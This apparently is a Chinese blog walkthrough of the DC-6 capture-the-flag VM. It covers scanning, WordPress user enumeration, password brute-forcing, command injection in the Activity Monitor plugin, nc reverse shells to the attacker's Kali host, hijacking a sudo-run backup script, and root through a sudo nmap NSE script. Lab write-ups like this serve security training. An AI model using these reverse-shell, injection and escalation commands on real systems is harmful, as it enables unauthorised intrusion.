复现DC-6 这些都是19年前的版本,现在更新到了86的新版本。 现在学的技术还是人家3年前的技术,还是得努力 下再下来 ![](https://img-blog.csdnimg.cn/fc2f0f9a6e6c40138ce7b8d1eea9dc2c.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAbTBfNTQ0ODc1ODM=,size_20,color_FFFFFF,t_70,g_se,x_16) ![](http://data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)
直接用VM打开 第一次打这种, ![](https://img-blog.csdnimg.cn/10912edf703c48668fed0a94afd47bc6.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAbTBfNTQ0ODc1ODM=,size_20,color_FFFFFF,t_70,g_se,x_16) ![](http://data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)
咋不给密码 看了看社区才发现密码要自己找 ![](https://img-blog.csdnimg.cn/4f57d0165b1240baa15f6901615f1b7b.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAbTBfNTQ0ODc1ODM=,size_20,color_FFFFFF,t_70,g_se,x_16) ![](http://data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)
先查一查这个虚拟机的ip 不要直接再本机用cmd的ipconfig,是假的 直接 kali同网段:arp-scan -l kali:192.168.0.105 DC-6:192.168.0.141 ![](https://img-blog.csdnimg.cn/67ac9c07ecc2467ca5bc0e1c66112e36.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAbTBfNTQ0ODc1ODM=,size_20,color_FFFFFF,t_70,g_se,x_16) ![](http://data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==) nmap扫一下这个ip
─# nmap -T4 -A -p- 192.168.0.141 //-A是进攻性扫描,T4是设置扫描时序级别,一般用4
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-01 17:58 CST
Nmap scan report for localhost (192.168.0.141)
Host is up (0.00041s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)
| 256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)
|_ 256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Did not follow redirect to http://wordy/
MAC Address: 00:0C:29:58 ![](static/image/smiley/default/biggrin.gif) B:F5 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.41 ms localhost (192.168.0.141)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.34 seconds 直接访问一下开放的端口 ![](https://img-blog.csdnimg.cn/2b0a8f52a17d4bb38afe51373a069f01.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAbTBfNTQ0ODc1ODM=,size_20,color_FFFFFF,t_70,g_se,x_16) ![](http://data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)
访问不了,需要添加host vi /etc/hosts ![](https://img-blog.csdnimg.cn/de797a826b72419b9b0262eeec93ce46.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAbTBfNTQ0ODc1ODM=,size_20,color_FFFFFF,t_70,g_se,x_16) ![](http://data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==) ![](https://img-blog.csdnimg.cn/3fae06d870a24aeea65fd462b5aebed0.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAbTBfNTQ0ODc1ODM=,size_20,color_FFFFFF,t_70,g_se,x_16)
ok,发现是wordpress站点 直接wpscan扫一下
nteresting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.25 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://wordy/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/module ... press_ghost_scanner
| - https://www.rapid7.com/db/module ... ordpress_xmlrpc_dos
| - https://www.rapid7.com/db/module ... dpress_xmlrpc_login
| - https://www.rapid7.com/db/module ... ess_pingback_access
[+] WordPress readme found: http://wordy/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://wordy/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.1.1 identified (Insecure, released on 2019-03-13).
| Found By: Rss Generator (Passive Detection)
| - http://wordy/index.php/feed/, <generator> https://wordpress.org/?v=5.1.1</generator>
| - http://wordy/index.php/comments/feed/, <generator> https://wordpress.org/?v=5.1.1</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://wordy/wp-content/themes/twentyseventeen/
| Last Updated: 2021-07-22T00:00:00.000Z
| Readme: http://wordy/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 2.8
| Style URL: http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 2.1 (80% confidence)
| Found By: Style (Passive Detection)
| - http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1, Match: 'Version: 2.1'
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <> (10 / 10) 100.00% Time: 00:00:00
User(s) Identified:
[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://wordy/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] graham
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] mark
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] sarah
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] jens
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register
[+] Finished: Mon Nov 1 18:13:43 2021
[+] Requests Done: 78
[+] Cached Requests: 6
[+] Data Sent: 17.65 KB
[+] Data Received: 17.834 MB
[+] Memory used: 151.133 MB
[+] Elapsed time: 00:00:05同时可以 -e vp扫一扫插件漏洞 ![](https://img-blog.csdnimg.cn/a6ab7b9194fb4a1aab4b59700b7f1f1b.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAbTBfNTQ0ODc1ODM=,size_20,color_FFFFFF,t_70,g_se,x_16) ![](http://data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)
并没有漏洞 搜集好用户名并保存到user.txt,以及字典是从/usr/share/wordlists里面找,跟着所给的线索把rockyou.txt里含有k01的字段重新写进新建的passwords.txt里面去 得到账号密码后,爆破出用户名为mark,密码为helpdesk01 后台登入口:/wp-login.php WordPress 5.8.1 存在插件漏洞
![](https://img-blog.csdnimg.cn/a4acca8c3f394e9f95299c1c4de51a6c.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAbTBfNTQ0ODc1ODM=,size_20,color_FFFFFF,t_70,g_se,x_16) ![](http://data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==) ![](https://img-blog.csdnimg.cn/e86b340f32594c9d921100911740fd81.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAbTBfNTQ0ODc1ODM=,size_20,color_FFFFFF,t_70,g_se,x_16)
该漏洞为Activity Monitor插件远程命令执行漏洞,找到activity monitor,选择tools,输入127.0.0.1|ls /,查看文件 反弹shell 127.0.0.1|nc 192.168.0.105 6666 -e /bin/bash o对 限制了输入框的输入长度,f12改一下 ![](https://img-blog.csdnimg.cn/3ec693a1ffe645b5b8626e0b03e10e5f.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAbTBfNTQ0ODc1ODM=,size_20,color_FFFFFF,t_70,g_se,x_16) ![](http://data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==) ![](https://img-blog.csdnimg.cn/bbbb4bdfb4234634a1f32585dd8452e8.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAbTBfNTQ0ODc1ODM=,size_20,color_FFFFFF,t_70,g_se,x_16)
ok
![](https://img-blog.csdnimg.cn/addfcb6fbc2b46a5aaa9db617366fb02.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAbTBfNTQ0ODc1ODM=,size_20,color_FFFFFF,t_70,g_se,x_16)
没有完全反弹 python -c 'import pty;pty.spawn("/bin/bash")' //当然是因为靶机有python ok ![](https://img-blog.csdnimg.cn/68c18e47e2284301b4886171d5937c09.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAbTBfNTQ0ODc1ODM=,size_20,color_FFFFFF,t_70,g_se,x_16) ![](http://data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==) ![](https://img-blog.csdnimg.cn/9301c23933204eadaf165959d3b22ab6.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAbTBfNTQ0ODc1ODM=,size_20,color_FFFFFF,t_70,g_se,x_16)
![](https://img-blog.csdnimg.cn/61a84633d5e9472497b0e71c5d254e58.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAbTBfNTQ0ODc1ODM=,size_15,color_FFFFFF,t_70,g_se,x_16)
用户名:graham 密码:GSo7isUM1D4,然后在jens用户目录下有个打包备份的脚本;先进行用户的切换 可以看到jens下的backups.sh(是免密权限运行,意味在backups.sh里插入一个反弹shell并执行的话会反弹jens的shell会话 echo 'nc 192.168.0.105 996 -e /bin/bash' > backups.sh sudo -u jens ./backups.sh ![](https://img-blog.csdnimg.cn/9fdf177871c04966b236f784cb726f04.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAbTBfNTQ0ODc1ODM=,size_20,color_FFFFFF,t_70,g_se,x_16) ![](http://data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==) ok
![](https://img-blog.csdnimg.cn/f4a35d8e7b4943e3917328b87a29391f.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAbTBfNTQ0ODc1ODM=,size_20,color_FFFFFF,t_70,g_se,x_16)
成功提到root 看到有nmap:可以用nmap提权 可以看到是可以使用root权限免密运行,还是和刚刚的思路一样,也是把shell呢进行反弹,因为nmap能够执行脚本功能,直接把/bin/sh写进/tmp/xxx.nse,然后让nmap运行它就可以直接提权 echo 'os.execute("/bin/sh")' > /tmp/xxx.nse
sudo nmap --script=/tmp/xxx.nse ![](https://img-blog.csdnimg.cn/1243270595164eef92aa0c0b958e2a56.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAbTBfNTQ0ODc1ODM=,size_20,color_FFFFFF,t_70,g_se,x_16) ![](http://data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==) ok
![](https://img-blog.csdnimg.cn/543fbbf3005d4d4b97146cf4c672fb34.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAbTBfNTQ0ODc1ODM=,size_20,color_FFFFFF,t_70,g_se,x_16)
cat theflag.txt ok
|